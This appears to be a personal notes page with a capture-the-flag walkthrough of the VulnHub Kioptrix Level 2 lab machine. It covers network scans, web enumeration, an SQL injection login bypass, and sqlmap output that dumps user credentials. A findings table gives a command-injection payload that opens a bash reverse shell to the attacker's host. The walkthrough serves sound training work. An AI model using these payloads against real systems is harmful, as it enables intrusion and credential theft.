</li><li data-nav-id=/notes/methodology/general/crack-password-encrypted-pdf/ title="encrypted password protected pdf" class=dd-item>
<a href=/notes/methodology/general/crack-password-encrypted-pdf/>
encrypted password protected pdf
</a>
</li><li data-nav-id=/notes/methodology/general/crack-password-protected-zip/ title="encrypted password protected zip" class=dd-item>
<a href=/notes/methodology/general/crack-password-protected-zip/>
encrypted password protected zip
</a>
</li><li data-nav-id=/notes/methodology/general/password-cracking/ title="password cracking" class=dd-item>
<a href=/notes/methodology/general/password-cracking/>
password cracking
</a>
<ul>
<li data-nav-id=/notes/methodology/general/password-cracking/rules/ title=rules class=dd-item>
<a href=/notes/methodology/general/password-cracking/rules/>
rules
</a>
</li><li data-nav-id=/notes/methodology/general/password-cracking/wordlists/ title=wordlists class=dd-item>
<a href=/notes/methodology/general/password-cracking/wordlists/>
wordlists
</a>
</li></ul></li><li data-nav-id=/notes/methodology/general/password-spraying/ title="Password Spraying" class=dd-item>
<a href=/notes/methodology/general/password-spraying/>
Password Spraying
</a>
</li><li data-nav-id=/notes/methodology/general/post-compermise-recon/ title="post compromise recon" class=dd-item>
<a href=/notes/methodology/general/post-compermise-recon/>
post compromise recon
</a>
</li><li data-nav-id=/notes/methodology/general/priv-esc/ title="priv esc" class=dd-item>
<a href=/notes/methodology/general/priv-esc/>
priv esc
</a>
</li><li data-nav-id=/notes/methodology/general/redis-exploitation/ title=Redis class=dd-item>
<a href=/notes/methodology/general/redis-exploitation/>
Redis
</a>
</li><li data-nav-id=/notes/methodology/general/shell-escaping/ title="shell escaping" class=dd-item>
<a href=/notes/methodology/general/shell-escaping/>
shell escaping
</a>
</li><li data-nav-id=/notes/methodology/general/sql-injection/ title="SQL Injection" class=dd-item>
<a href=/notes/methodology/general/sql-injection/>
SQL Injection
</a>
</li><li data-nav-id=/notes/methodology/general/web/ title=Web class=dd-item>
<a href=/notes/methodology/general/web/>
Web
</a>
</li></ul></li><li data-nav-id=/notes/methodology/internal/ title=Internal class=dd-item>
<a href=/notes/methodology/internal/>
Internal
</a>
<ul>
<li data-nav-id=/notes/methodology/internal/active-directory/ title="Active Directory" class=dd-item>
<a href=/notes/methodology/internal/active-directory/>
Active Directory
</a>
<ul>
<li data-nav-id=/notes/methodology/internal/active-directory/credential-access/ title=credentialaccess class=dd-item>
<a href=/notes/methodology/internal/active-directory/credential-access/>
credentialaccess
</a>
</li><li data-nav-id=/notes/methodology/internal/active-directory/ipv6-dns-takeover/ title="IPv6 DNS Takeover" class=dd-item>
<a href=/notes/methodology/internal/active-directory/ipv6-dns-takeover/>
IPv6 DNS Takeover
</a>
</li><li data-nav-id=/notes/methodology/internal/active-directory/llmnr-and-nbt-ns/ title="LLMNR and NBT-NS" class=dd-item>
<a href=/notes/methodology/internal/active-directory/llmnr-and-nbt-ns/>
LLMNR and NBT-NS
</a>
</li><li data-nav-id=/notes/methodology/internal/active-directory/smb-relay/ title="SMB Relay" class=dd-item>
<a href=/notes/methodology/internal/active-directory/smb-relay/>
SMB Relay
</a>
</li><li data-nav-id=/notes/methodology/internal/active-directory/wpad/ title=WPAD class=dd-item>
<a href=/notes/methodology/internal/active-directory/wpad/>
WPAD
</a>
</li></ul></li><li data-nav-id=/notes/methodology/internal/postexploit/ title=postexploit class=dd-item>
<a href=/notes/methodology/internal/postexploit/>
postexploit
</a>
<ul>
<li data-nav-id=/notes/methodology/internal/postexploit/steal-access-tokens/ title="steal access tokens" class=dd-item>
<a href=/notes/methodology/internal/postexploit/steal-access-tokens/>
steal access tokens
</a>
</li></ul></li></ul></li></ul></li><li data-nav-id=/notes/networking/ title=Networking class=dd-item>
<a href=/notes/networking/>
<i class="fas fa-network-wired"></i> Networking
</a>
<ul>
<li data-nav-id=/notes/networking/osi-model/ title="OSI Model" class=dd-item>
<a href=/notes/networking/osi-model/>
<i class="fas fa-ethernet"></i> OSI Model
</a>
<ul>
<li data-nav-id=/notes/networking/osi-model/layer1/ title="Layer 1" class=dd-item>
<a href=/notes/networking/osi-model/layer1/>
<i class="fas fa-ethernet"></i> Layer 1
</a>
</li><li data-nav-id=/notes/networking/osi-model/layer2/ title="Layer 2" class=dd-item>
<a href=/notes/networking/osi-model/layer2/>
<i class="fas fa-ethernet"></i> Layer 2
</a>
</li><li data-nav-id=/notes/networking/osi-model/layer3/ title="Layer 3" class=dd-item>
<a href=/notes/networking/osi-model/layer3/>
<i class="fas fa-ethernet"></i> Layer 3
</a>
</li><li data-nav-id=/notes/networking/osi-model/layer4/ title="Layer 4" class=dd-item>
<a href=/notes/networking/osi-model/layer4/>
<i class="fas fa-ethernet"></i> Layer 4
</a>
</li><li data-nav-id=/notes/networking/osi-model/layer5/ title="Layer 5" class=dd-item>
<a href=/notes/networking/osi-model/layer5/>
<i class="fas fa-ethernet"></i> Layer 5
</a>
</li><li data-nav-id=/notes/networking/osi-model/layer6/ title="Layer 6" class=dd-item>
<a href=/notes/networking/osi-model/layer6/>
<i class="fas fa-ethernet"></i> Layer 6
</a>
</li><li data-nav-id=/notes/networking/osi-model/layer7/ title="Layer 7" class=dd-item>
<a href=/notes/networking/osi-model/layer7/>
<i class="fas fa-ethernet"></i> Layer 7
</a>
</li></ul></li><li data-nav-id=/notes/networking/tcpip-model/ title="TCP/IP Model" class=dd-item>
<a href=/notes/networking/tcpip-model/>
<i class="fas fa-ethernet"></i> TCP/IP Model
</a>
</li></ul></li><li data-nav-id=/notes/random/ title="Random Things" class=dd-item>
<a href=/notes/random/>
<i class="fas fa-random"></i> Random Things
</a>
<ul>
<li data-nav-id=/notes/random/backscatter/ title=backscatter class=dd-item>
<a href=/notes/random/backscatter/>
<i class="fas fa-random"></i> backscatter
</a>
</li><li data-nav-id=/notes/random/dash_in_file_name/ title="dash in file name" class=dd-item>
<a href=/notes/random/dash_in_file_name/>
<i class="fas fa-random"></i> dash in file name
</a>
</li><li data-nav-id=/notes/random/ssh-sha256-to-public-key/ title="ssh sha256 to public key" class=dd-item>
<a href=/notes/random/ssh-sha256-to-public-key/>
<i class="fas fa-random"></i> ssh sha256 to public key
</a>
</li></ul></li><li data-nav-id=/notes/z_private/ title=Z_Private class=dd-item>
<a href=/notes/z_private/>
<i class="fas fa-lock"></i> Private
</a>
</li></ul></li></ul><section id=shortcuts>
<h3>More</h3><ul>
<li>
<a class=padding href=https://github.com/justin-p/><i class="fab fa-github"></i> Github</a>
</li><li>
<a class=padding href=https://justin-p.me/><i class="fas fa-kiss-wink-heart"></i> Blog</a>
</li><li>
<a class=padding href=https://twitter.com/JustinPerdok><i class="fab fa-twitter"></i> Twitter</a>
</li><li>
<a class=padding href=https://www.linkedin.com/in/justinperdok/><i class="fab fa-linkedin-in"></i> LinkedIn</a>
</li></ul></section><section id=footer>
<p>
Built with
<a href=https://github.com/matcornic/hugo-theme-learn>
Hugo Learn
</a>
and
<a href=https://gohugo.io/>
Hugo
</a>
</p></section></div></nav><section id=body>
<div id=overlay></div><div class="padding highlightable">
<div>
<div id=top-bar>
<div id=breadcrumbs itemscope itemtype=http://data-vocabulary.org/Breadcrumb>
<span id=sidebar-toggle-span>
<a href=# id=sidebar-toggle data-sidebar-toggle>
<i class="fas fa-bars"></i>
</a>
</span>
<span id=toc-menu><i class="fas fa-list-alt"></i></span>
<span class=links>
<a href=/></a> > <a href=/notes/>Notes</a> > <a href=/notes/ctfs/>CTFs</a> > <a href=/notes/ctfs/vulnhub/>VulnHub</a> > <a href=/notes/ctfs/vulnhub/kioptrix/>Kioptrix</a> > Level 2
</span>
</div><div class=progress>
<div class=wrapper>
<nav id=TableOfContents>
<ul>
<li><a href=#level2>level2</a>
<ul>
<li><a href=#enum>Enum</a></li></ul></li></ul></nav></div></div></div></div><div id=head-tags>
<div class=tags>
<a class=tag-link href=/tags/vulnhub>VulnHub</a>
</div></div><div id=body-inner>
<h2 id=level2>level2</h2><table>
<thead>
<tr>
<th>Proto</th><th>port</th><th>Service/URL</th><th>Info</th><th>Potential Vulns</th><th>Verified Vulns</th></tr></thead><tbody>
<tr>
<td></td><td></td><td>system</td><td>CentOS 4.5 Linux 2.6.9-55.EL i686</td><td><a href=https://www.exploit-db.com/exploits/9542>&lsquo;ip_append_data()&rsquo; Ring0 Privilege Escalation (1)</a> <a href=https://www.exploit-db.com/exploits/9545>&lsquo;sock_sendpage()&rsquo; Local Privilege Escalation</a></td><td>&lsquo;sock_sendpage()&rsquo;</td></tr><tr>
<td>TCP</td><td>22</td><td>SSH</td><td>OpenSSH 3.9p1 (protocol 1.99) </td><td></td><td></td></tr><tr>
<td>TCP</td><td>80,443</td><td>HTTP/S</td><td>Apache httpd 2.0.52 (EOL) no secuirty headers Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE CentOS 4.5 Linux 2.6.9-55.EL i686</td><td></td><td></td></tr><tr>
<td> PHP/4.3.9 (EOL) <a href="http://192.168.88.130/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000">PHP Credits file</a></td><td><a href=https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2005-2700>SSLVerifyClient bypass</a> <a href=https://www.exploit-db.com/exploits/9939>PHP &lt; 4.5.0 - Unserialize Overflow</a></td><td></td><td></td><td></td><td></td></tr><tr>
<td>TCP</td><td>80,443</td><td>http://192.168.88.130/index.php</td><td></td><td>SQL Injection</td><td><code>admin ' OR ' 1'='1</code></td></tr><tr>
<td>TCP</td><td>80,443</td><td>http://192.168.88.130/pingit.php</td><td></td><td>Command Injection</td><td>ip=8.8.8.8;bash -i >& /dev/tcp/192.168.88.128/4444 0>&1&submit=submit</td></tr><tr>
<td>TCP</td><td>111</td><td>RPC bind</td><td></td><td></td><td></td></tr><tr>
<td>TCP</td><td>620</td><td>status RPC</td><td></td><td></td><td></td></tr><tr>
<td>TCP</td><td>631</td><td>IPP</td><td>CUPS 1.1 Allowed HTTP Methods: GET, HEAD, OPTIONS, POST, PUT</td><td><a href=https://www.exploit-db.com/exploits/24977>&rsquo;.HPGL&rsquo; File Processor Buffer Overflow</a> <a href=https://www.exploit-db.com/exploits/22106>CUPS 1.1.x - Negative Length HTTP Header </a></td><td></td></tr><tr>
<td>TCP</td><td>3306</td><td>MySQL</td><td>MySQL IP filtered</td><td></td><td></td></tr><tr>
<td>UDP</td><td>111</td><td>RPCbind</td><td></td><td></td><td></td></tr></tbody></table><h3 id=enum>Enum</h3><h4 id=find-ip>Find IP</h4><pre><code class=language-bash>nmap -n -sn -PR 192.168.88.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-02 20:32 CET
Nmap scan report for 192.168.88.2
Host is up (0.00042s latency).
MAC Address: 00:50:56:FE:4E:C1 (VMware)
Nmap scan report for 192.168.88.130
Host is up (0.00099s latency).
MAC Address: 00:0C:29:D7:71:4E (VMware)
Nmap scan report for 192.168.88.254
Host is up (0.0028s latency).
MAC Address: 00:50:56:F7:8F:D0 (VMware)
Nmap scan report for 192.168.88.128
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.17 seconds
</code></pre><h4 id=tcp>TCP</h4><pre><code class=language-bash>nmap -T4 -p- -A 192.168.88.130 -oA tcp
</code></pre><pre><code class=language-bash>Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-02 20:34 CET
Nmap scan report for 192.168.88.130
Host is up (0.00060s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesnt have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-01-02T17:25:48+00:00; -2h09m46s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_DES_64_CBC_WITH_MD5
620/tcp  open  status     1 (RPC #100024)
631/tcp  open  ipp        CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:D7:71:4E (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -2h09m46s

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms 192.168.88.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/
submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.32 seconds
</code></pre><h4 id=udp>UDP</h4><pre><code class=language-bash>nmap -sU -T4 192.168.88.130 -oA udp
</code></pre><pre><code class=language-bash>Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-02 21:12 CET
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 1.40% done; ETC: 21:13 (0:01:10 remaining)
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 1.73% done; ETC: 21:14 (0:01:53 remaining)
Stats: 0:15:05 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 93.13% done; ETC: 21:28 (0:01:07 remaining)
Nmap scan report for 192.168.88.130
Host is up (0.00068s latency).
Not shown: 957 closed ports, 42 open|filtered ports
PORT    STATE SERVICE
111/udp open  rpcbind
MAC Address: 00:0C:29:D7:71:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1029.23 seconds
</code></pre><h4 id=19216888130-80443>192.168.88.130 80/443</h4><h5 id=nikto>Nikto</h5><pre><code class=language-bash>nikto -h 192.168.88.130
</code></pre><pre><code class=language-bash>- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.88.130
+ Target Hostname:    192.168.88.130
+ Target Port:        80
+ Start Time:         2020-01-02 20:35:53 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 19:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2020-01-02 20:36:46 (GMT1) (53 seconds)
---------------------------------------------------------------------------
</code></pre><h6 id=gobuster>gobuster</h6><pre><code class=language-bash>./go/bin/gobuster dir -u http://192.168.88.130 -w /usr/share/wordlists/dirb/common.txt -t 40 -e
</code></pre><pre><code class=language-bash>===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.88.130
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/01/02 20:50:44 Starting gobuster
===============================================================
http://192.168.88.130/.htpasswd (Status: 403)
http://192.168.88.130/.htaccess (Status: 403)
http://192.168.88.130/.hta (Status: 403)
http://192.168.88.130/cgi-bin/ (Status: 403)
http://192.168.88.130/index.php (Status: 200)
http://192.168.88.130/manual (Status: 301)
http://192.168.88.130/usage (Status: 403)
===============================================================
2020/01/02 20:50:45 Finished
===============================================================
</code></pre><pre><code class=language-bash>./go/bin/gobuster dir -u 192.168.88.130 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 40 -e
</code></pre><pre><code class=language-bash>===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.88.130
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/01/02 20:52:04 Starting gobuster
===============================================================
http://192.168.88.130/index.php (Status: 200)
http://192.168.88.130/manual (Status: 301)
http://192.168.88.130/usage (Status: 403)
===============================================================
2020/01/02 20:54:29 Finished
===============================================================
</code></pre><h6 id=sql-injection>SQL Injection</h6><pre><code class=language-bash>username: admin ' OR ' 1'='1
password: admin ' OR ' 1'='1
</code></pre><pre><code class=language-txt>POST /index.php HTTP/1.1
Host: 192.168.88.130
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.88.130/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin&amp;psw=admin&amp;btnLogin=Login
</code></pre><pre><code class=language-bash>sqlmap -r request.txt -p psw --dbms mysql --level=5 --risk=3 --dump-all
</code></pre><pre><code class=language-bash>        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:16:43 /2020-01-02/

[22:16:43] [INFO] parsing HTTP request from 'request.txt'
[22:16:43] [INFO] testing connection to the target URL
[22:16:43] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:16:43] [INFO] testing if the target URL content is stable
[22:16:43] [INFO] target URL content is stable
[22:16:43] [WARNING] heuristic (basic) test shows that POST parameter 'psw' might not be injectable
[22:16:44] [INFO] testing for SQL injection on POST parameter 'psw'
[22:16:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:16:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[22:16:44] [INFO] POST parameter 'psw' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string=&quot;Web&quot;)
[22:16:44] [INFO] testing 'MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[22:16:44] [INFO] testing 'MySQL &gt;= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[22:16:44] [INFO] testing 'MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[22:16:44] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.5 error-based - Parameter replace (EXP)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.1 error-based - Parameter replace (UPDATEXML)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[22:16:44] [INFO] testing 'MySQL inline queries'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 stacked queries (comment)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 stacked queries'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 stacked queries (query SLEEP - comment)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 stacked queries (query SLEEP)'
[22:16:44] [INFO] testing 'MySQL &lt; 5.0.12 stacked queries (heavy query - comment)'
[22:16:44] [INFO] testing 'MySQL &lt; 5.0.12 stacked queries (heavy query)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP - comment)'
[22:16:44] [INFO] testing 'MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP - comment)'
[22:16:44] [INFO] testing 'MySQL &lt; 5.0.12 AND time-based blind (heavy query)'
[22:17:04] [INFO] POST parameter 'psw' appears to be 'MySQL &lt; 5.0.12 AND time-based blind (heavy query)' injectable
[22:17:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:17:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:17:04] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[22:17:05] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'                                                                                              [38/1863]
[22:17:05] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[22:17:05] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[22:17:05] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[22:17:05] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[22:17:05] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[22:17:05] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[22:17:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:17:05] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[22:17:06] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[22:17:06] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[22:17:06] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[22:17:06] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[22:17:06] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[22:17:06] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[22:17:06] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[22:17:07] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[22:17:07] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[22:17:07] [INFO] checking if the injection point on POST parameter 'psw' is a false positive
POST parameter 'psw' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 552 HTTP(s) requests:
---
Parameter: psw (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin&amp;psw=-3012' OR 8578=8578-- aTyJ&amp;btnLogin=Login

    Type: time-based blind
    Title: MySQL &lt; 5.0.12 AND time-based blind (heavy query)
    Payload: uname=admin&amp;psw=admin' AND 5240=BENCHMARK(5000000,MD5(0x63415659))-- YhHX&amp;btnLogin=Login
---
[22:17:19] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL &lt; 5.0.12
[22:17:19] [INFO] sqlmap will dump entries of all tables from all databases now
[22:17:19] [INFO] fetching database names
[22:17:19] [INFO] fetching number of databases
[22:17:19] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:17:19] [INFO] retrieved:
[22:17:19] [INFO] retrieved:
[22:17:19] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[22:17:19] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[22:17:19] [ERROR] unable to retrieve the number of databases
[22:17:19] [INFO] falling back to current database
[22:17:19] [INFO] fetching current database
[22:17:19] [INFO] retrieved: webapp
[22:17:19] [INFO] fetching tables for database: 'webapp'
[22:17:19] [INFO] fetching number of tables for database 'webapp'
[22:17:19] [INFO] retrieved:
[22:17:19] [INFO] retrieved:
[22:17:19] [WARNING] unable to retrieve the number of tables for database 'webapp'
[22:17:19] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
which common tables (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-tables.txt' (press Enter)
[2] custom
&gt; 1
[22:17:22] [INFO] performing table existence using items from '/usr/share/sqlmap/data/txt/common-tables.txt'
[22:17:22] [INFO] adding words used on web page to the check list
[22:17:24] [WARNING] running in a single-thread mode. This could take a while
[22:17:24] [INFO] retrieved: users

[22:17:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[22:17:43] [INFO] fetching current database
[22:17:43] [INFO] fetching columns for table 'users' in database 'webapp'
[22:17:43] [INFO] retrieved:
[22:17:43] [INFO] retrieved:
[22:17:43] [ERROR] unable to retrieve the number of columns for table 'users' in database 'webapp'
[22:17:43] [WARNING] unable to retrieve column names for table 'users' in database 'webapp'
do you want to use common column existence check? [y/N/q] y
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter)
[2] custom
&gt; 1
[22:17:50] [INFO] checking column existence using items from '/usr/share/sqlmap/data/txt/common-columns.txt'
[22:17:50] [INFO] adding words used on web page to the check list
[22:17:52] [WARNING] running in a single-thread mode. This could take a while
[22:17:52] [INFO] retrieved: id
[22:17:52] [INFO] retrieved: username
[22:17:53] [INFO] retrieved: password
[22:18:06] [INFO] retrieved: password
[22:18:06] [INFO] retrieved: username

[22:18:06] [INFO] fetching entries for table 'users' in database 'webapp'
[22:18:06] [INFO] fetching number of entries for table 'users' in database 'webapp'
[22:18:06] [INFO] retrieved: 2
[22:18:06] [INFO] retrieved: 1
[22:18:06] [INFO] retrieved: 5afac8d85f
[22:18:06] [INFO] retrieved: admin
[22:18:07] [INFO] retrieved: 2
[22:18:07] [INFO] retrieved: 66lajGGbla
[22:18:07] [INFO] retrieved: john
Database: webapp
Table: users
[2 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
